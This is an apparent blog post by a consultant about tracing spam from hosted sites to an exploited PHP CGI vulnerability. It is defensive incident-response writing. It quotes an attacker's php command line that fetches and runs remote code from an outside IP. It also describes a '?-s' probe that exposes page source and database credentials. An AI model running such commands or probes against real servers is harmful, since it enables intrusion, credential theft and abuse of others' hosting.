Find the hacker
I received a phone call towards noon today from a hosting provider in Florida who, after spending days of trying to locate the source of spam coming from sites they host, needed expert help to locate the source of the problem.
While they knew the domain names of sites they host involved in sending the spam, they were not able to see how this was happening.
The code on the sites looked clean. Anti-virus scans on the sites came back clean.
Sucuri Security scans of the site showed clean; and the web site was on zero black lists.
Yet, they had the actual spam emails with the email header pointing to the index.php of the sites in question.
Once I got access to the server, I was able to review the processes that were running.
What do I see?
php -dsafe_mode=Off -ddisable_functions=NULL -dallow_url_fopen=On -dallow_url_include=On -dauto_prepend_file=http://18.104.22.168/send.txt
In English, the attacker was using the site as an engine to run the code at http://22.214.171.124/send.txt which in and of itself was PHP code.
Quality assurance always matters, so I reviewed the web site access logs, and found each attempt to use the above type logic worked.
As final confirmation, I browsed the sites home page and appended “?-s” to the home page so it looked like http://domain_goes_here/index.php?-s
What I saw proved the point — rather than seeing the home page, I saw the PHP code including the database login credentials which would allow any hacker to really dive in and deface the site, steal data, etc.
What does it mean when “?-s” is appended to a PHP page and you see code?
It means the site, and most likely the entire server, is vulnerable to the PHP CGI vulnerability which came out in May 2012 (the vulnerability existed for several years; but was published in May).
In terms of a lesson to pass on, if you have one or more web sites you suspect are sending out spam or otherwise being abused by hackers but everything else looks clean, check if the site(s) involved are vulnerable to the PHP CGI attack vector.
Do you have some tips to share for finding hacks and malware where everything else looks innocent?
Please share them by putting in your comments.
P.S. Sucuri Security does a great job. Their scanner not reporting hacks or malware was 100% accurate. There were no hacks or malware on the site that was scanned; it was an issue of vulnerable code being abused. I did pass on a suggestion to the Sucuri team to check for the PHP CGI vulnerability as part of the excellent service.